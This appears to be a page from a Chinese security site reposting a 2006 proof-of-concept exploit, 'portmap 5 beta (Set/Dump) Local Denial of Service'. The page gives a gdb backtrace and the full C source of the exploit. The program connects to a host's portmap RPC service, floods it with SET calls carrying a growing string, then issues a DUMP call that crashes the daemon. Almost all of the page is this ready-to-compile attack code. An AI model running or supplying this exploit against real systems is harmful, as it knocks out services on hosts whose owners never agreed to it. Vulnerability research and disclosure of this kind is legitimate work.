首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
portmap 5 beta (Set/Dump) Local Denial of Service Exploit
来源:fbossi[at]netcomm[dot]com[dot]ar 作者:fbossi 发布时间:2006-05-23  

/////////////////////////////////////
// portmap Set+Dump Local DoS - PoC
////////////////////////////////////
//
// Federico L. Bossi Bonin
// fbossi[at]netcomm[dot]com[dot]ar
////////////////////////////////////

// Tested on Linux with version 5

// USE DEBUGGING MODE
/////////////////////

// (gdb) backtrace
// #0 0xffffe410 in __kernel_vsyscall ()
// #1 0xb7f21343 in write () from /lib/tls/libc.so.6
// #2 0xb7f524d5 in svcfd_create () from /lib/tls/libc.so.6
// #3 0xb7f5467a in xdrrec_create () from /lib/tls/libc.so.6
// #4 0xb7f546f4 in xdrrec_create () from /lib/tls/libc.so.6
// #5 0xb7f5350d in xdr_u_long () from /lib/tls/libc.so.6
// #6 0xb7f4f48c in xdr_pmap () from /lib/tls/libc.so.6
// #7 0xb7f54e3b in xdr_reference () from /lib/tls/libc.so.6
// #8 0xb7f4f565 in xdr_pmaplist () from /lib/tls/libc.so.6
// #9 0xb7f50025 in xdr_accepted_reply () from /lib/tls/libc.so.6
// #10 0xb7f53cc5 in xdr_union () from /lib/tls/libc.so.6
// #11 0xb7f50171 in xdr_replymsg () from /lib/tls/libc.so.6
// #12 0xb7f5266e in svcfd_create () from /lib/tls/libc.so.6
// #13 0xb7f50ddc in svc_sendreply () from /lib/tls/libc.so.6
// #14 0x0804984d in reg_service (rqstp=0xbfecab4c, xprt=0xbfec872c) at portmap.c:515
// #15 0xb7f51345 in svc_getreq_common () from /lib/tls/libc.so.6
// #16 0xb7f5111d in svc_getreq_poll () from /lib/tls/libc.so.6
// #17 0xb7f51979 in svc_run () from /lib/tls/libc.so.6
// #18 0x080492dd in main (argc=134542752, argv=0xbfecb0e0) at portmap.c:303

#include <stdio.h>
#include <rpc/rpc.h>
#include <sys/socket.h>
#include <sys/time.h>
#include <netdb.h>
#include <rpc/pmap_prot.h>

int i;
int len=600;
char myhost[256];

main(int argc, char *argv[]) {

if (argc < 2) {
printf("usage:%s <hostname>\n",argv[0]);
exit(1);
}

if (argc >2) { len=atoi(argv[2]); }
if (len > 1024) { len=1024; }

unsigned long PROGRAM=100000;
unsigned long VERSION=2;

struct hostent *hp;
struct sockaddr_in server_addr;
int sock = RPC_ANYSOCK;
register CLIENT *client;
enum clnt_stat clnt_stat;
struct timeval timeout;
timeout.tv_sec = 40;
timeout.tv_usec = 0;


if ((hp = gethostbyname(argv[1])) == NULL) {
printf("Can't resolve %s\n",argv[1]);
exit(0);
}

gethostname(myhost,255);
bcopy(hp->h_addr, (caddr_t)&server_addr.sin_addr,hp->h_length);
server_addr.sin_family = AF_INET;
server_addr.sin_port = 0;

if ((client = clnttcp_create(&server_addr,PROGRAM,VERSION,&sock,1024,1024)) == NULL) {
clnt_pcreateerror("clnttcp_create");
exit(0);
}

client->cl_auth = authunix_create(myhost, 0, 0, 0, NULL);

char *data = (char *) malloc(1024);
memset(data,0x0,strlen(data));

char *response = (char *) malloc(1024);
memset(response,0x0,strlen(response));

for (i = 0 ; i < len ; i++) {
memcpy(data+strlen(data),"1",1);
clnt_call(client,1,(xdrproc_t) xdr_wrapstring ,(char *) &data,(xdrproc_t) xdr_wrapstring,(char *) response,timeout);
}

clnt_call(client,4,(xdrproc_t) xdr_wrapstring ,(char *) &data,(xdrproc_t) xdr_wrapstring,(char *) response,timeout);

clnt_destroy(client);
close(sock);
free(data);
free(response);
exit(0);
}



 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Cyrus IMAPD 2.3.2 (pop3d) Remo
·Nucleus CMS <= 3.22 (DIR_LI
·Fusion News v.1.0 (fil_config)
·Drupal <= 4.7 (attachment m
·Xoops <= 2.0.13.2 xoopsOpti
·Novell eDirectory 8.8 Long URI
·Woltlab Burning Board <= 2.
·WordPress <= 2.0.2 (cache)
·IntelliTamper 2.07 (*.map file
·MS Internet Explorer (HTML Tag
·phpListPro <= 2.0.1 (Langua
·Eggblog <= 3.x Remote (SQL
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved